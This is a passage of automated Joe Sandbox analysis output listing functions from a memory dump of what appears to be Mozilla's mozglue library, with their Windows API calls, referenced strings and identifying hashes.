                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000104), ref: 6BA5EBB5
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6BA8D7F3), ref: 6BA5EBC3
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6BA8D7F3), ref: 6BA5EBD6
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6BA8D7F3), ref: 6BA5EBF6
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,6BA8D7F3), ref: 6BA5EC0E
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BA75EDB
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: memset.VCRUNTIME140(6BAB7765,000000E5,55CCCCCC), ref: 6BA75F27
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BA75FB2
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,6BA8D7F3), ref: 6BA5EC1A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2948488910-0
                                                                                                                                                                                                                                      • Opcode ID: cd094e08774c8e69d2a17e12e45816bf273c7f7f952c51de8e608af4bf55d455
                                                                                                                                                                                                                                      • Instruction ID: 19bd5a61e8b0305b6de4ac309e8d987376747f971bb58ad6fc344d0d3324c4d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd094e08774c8e69d2a17e12e45816bf273c7f7f952c51de8e608af4bf55d455
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A51129F2E043545BEF008B789D4576F3AA89B41719F054434E845DB340E379CE9087E3
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAA0270
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAA02E9
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BAA02F6
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BAA033A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                      • String ID: about:blank
                                                                                                                                                                                                                                      • API String ID: 2047719359-258612819
                                                                                                                                                                                                                                      • Opcode ID: 4a9e6b714ddbe5bafdd6b7099d6fdf43221999b6a69a6068302379a90aada78d
                                                                                                                                                                                                                                      • Instruction ID: 9eb06feb8aa8a12f2ccd3e17d3c82c3ef5474ddb16a8321e42f64e0f3cd03906
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a9e6b714ddbe5bafdd6b7099d6fdf43221999b6a69a6068302379a90aada78d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E51AEB4A003198FCF10DF68C880A9AB7F1FF89324F54855AD919A7340D736F986CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9E12F
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6BA9E084,00000000), ref: 6BA9E137
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508
                                                                                                                                                                                                                                      • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6BA9E196
                                                                                                                                                                                                                                      • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6BA9E1E9
                                                                                                                                                                                                                                        • Part of subcall function 6BA999A0: GetCurrentThreadId.KERNEL32 ref: 6BA999C1
                                                                                                                                                                                                                                        • Part of subcall function 6BA999A0: AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA999CE
                                                                                                                                                                                                                                        • Part of subcall function 6BA999A0: ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA999F8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6BA9E13F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                      • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                                                                                                                                                                      • API String ID: 2491745604-3904374701
                                                                                                                                                                                                                                      • Opcode ID: f4072c65e3cf87e81e142753ff32076bb55cd43a068183f77866844df7d7a55d
                                                                                                                                                                                                                                      • Instruction ID: 479cdcd79eb8a211897cc1fd6b3fce3e4820c47d0cffe89200d6640ca517d361
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4072c65e3cf87e81e142753ff32076bb55cd43a068183f77866844df7d7a55d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D3126B16543009FCF00AF2C954136BF7E5EFC9648F14852EE8994B242EB78C989DB93
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BA90222
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(0000000C), ref: 6BA90231
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BA9028B
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6BA902F7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 2782572024-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 5422f38f3dc6a0f435aab5ed19bda8239c80b92ba76acb434b1ed34ece9de153
                                                                                                                                                                                                                                      • Instruction ID: 9db89ee566d4511e7632585b956b1b7628def568399e756e860f90b67a559721
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5422f38f3dc6a0f435aab5ed19bda8239c80b92ba76acb434b1ed34ece9de153
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE31BFB2A002108FEF64DF68D98071AB7E6EF44794B18856DDA5ADB340E735EC81CB81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9E047
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9E04F
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9E09C
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9E0B0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [I %d/%d] profiler_get_profile, xrefs: 6BA9E057
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_get_profile
                                                                                                                                                                                                                                      • API String ID: 1832963901-4276087706
                                                                                                                                                                                                                                      • Opcode ID: 24809208355e5a79662b5a295d02c6aef5b5c3d1d903207f99807e78174e37ab
                                                                                                                                                                                                                                      • Instruction ID: f4e617fa5d22cd374b78e87d55d71810928f4e0c0b109e2c1d11d53283c573d5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24809208355e5a79662b5a295d02c6aef5b5c3d1d903207f99807e78174e37ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C21F874A10204AFDF00EF74E5596AEB7F5FF85208F444514E80697341DB39E98AC791
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SearchPathW.KERNEL32(?,6BA7BFBD,.dll,00000000,00000000,00000000,6BA7BFBD), ref: 6BABABBD
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000001), ref: 6BABABD8
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6BABABEB
                                                                                                                                                                                                                                      • SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6BABAC03
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PathSearch$mallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                      • String ID: .dll
                                                                                                                                                                                                                                      • API String ID: 3063185715-2738580789
                                                                                                                                                                                                                                      • Opcode ID: e0cd6f041170442bed5e6caf95cdb7d40c9185ed8386f005fc67c3359dcf61c8
                                                                                                                                                                                                                                      • Instruction ID: ffeaadf140fac6e276ea8427a71b836eee5a167b84a81317a5edeee7fc504fc0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0cd6f041170442bed5e6caf95cdb7d40c9185ed8386f005fc67c3359dcf61c8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 280196B2A042156FEF005F74CC45ABFB6AEEB85250F054035FD04D3210EB799D9547B1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADF770,-00000001,?,6BACE330,?,6BA7BDF7), ref: 6BABA7AF
                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6BA7BDF7), ref: 6BABA7C2
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000018,?,6BA7BDF7), ref: 6BABA7E4
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADF770), ref: 6BABA80A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                                                                                                                                      • String ID: accelerator.dll
                                                                                                                                                                                                                                      • API String ID: 2442272132-2426294810
                                                                                                                                                                                                                                      • Opcode ID: 2cc725753c4a3f936be30c265ddb3a43fd13c7ee38304ae7953db1165ab09b3a
                                                                                                                                                                                                                                      • Instruction ID: f21b9c383947f115dd5576139bd766156d0ce24140b835ee7ae9806b10bbd3f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cc725753c4a3f936be30c265ddb3a43fd13c7ee38304ae7953db1165ab09b3a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20018FB16083049FDF04CF19D885C5677B9FB8931170880AEE819CB341DB71D880CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ole32,?,6BA5EE51,?), ref: 6BA5F0B2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6BA5F0C2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ole32, xrefs: 6BA5F0AD
                                                                                                                                                                                                                                      • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6BA5F0DC
                                                                                                                                                                                                                                      • Could not find CoTaskMemFree, xrefs: 6BA5F0E3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                                                                                                                                                                      • API String ID: 2574300362-1578401391
                                                                                                                                                                                                                                      • Opcode ID: 222be4d2d48e4bbde11f9239cbcec1006fb23495e9fd43273b28bcfa1c694572
                                                                                                                                                                                                                                      • Instruction ID: 55ba9f2545b12f80589aca87bd57fa8ccf5514c520c1c00ddb7b03e091c54594
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 222be4d2d48e4bbde11f9239cbcec1006fb23495e9fd43273b28bcfa1c694572
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCE04871649301BFEF145A75981963737A97B52605308C13DE612D1640FE3BD591C631
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(user32.dll,?,?,6BA6434E), ref: 6BAB73EB
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6BAB7404
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,6BA6434E), ref: 6BAB7413
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: SetProcessDpiAwarenessContext$user32.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-397433131
                                                                                                                                                                                                                                      • Opcode ID: c54a64cd359aa93b1e4e41dac69f4d1b6eecbc7bff882635551c3f50e940af20
                                                                                                                                                                                                                                      • Instruction ID: 641fef66e488386b0b0c32b0ed30eb37eec0ebb6ebb893fa74279ffd0b8b6da0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c54a64cd359aa93b1e4e41dac69f4d1b6eecbc7bff882635551c3f50e940af20
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACE012702053019FEB102FA4C808B42BEECAB06642F00C92EEA95C3710EFB9D8419BA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67266), ref: 6BA901C8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6BA901E7
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BA67266), ref: 6BA901FE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-1489773717
                                                                                                                                                                                                                                      • Opcode ID: 6a3e23c7d2e67c081cfc86dd24874ec276d989d2868c11e09a5b61a251915658
                                                                                                                                                                                                                                      • Instruction ID: effaedc477e903fe9a842f5a2b9aa2ebd734726c86f33867f38d2c7960795f66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a3e23c7d2e67c081cfc86dd24874ec276d989d2868c11e09a5b61a251915658
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADE09A745893859FEF106F65980870B7BF8BB87B81F54C56EEA14C2240DF7AC042EB12
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67297), ref: 6BA90128
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6BA90147
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BA67297), ref: 6BA9015E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-1536241729
                                                                                                                                                                                                                                      • Opcode ID: b128b9a768022c11960f13ff02a7db9e9d6079e7c4e949ba8a77dd60a42b19f1
                                                                                                                                                                                                                                      • Instruction ID: c24ff2bf75df34022e132d54d5d3f69068a39c9365deb1598ea7b87bc8bdce32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b128b9a768022c11960f13ff02a7db9e9d6079e7c4e949ba8a77dd60a42b19f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90E0E5781083449FEF106B29980C70A3BE8A783741F54C12FA904C3340DB7AC0429B12
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

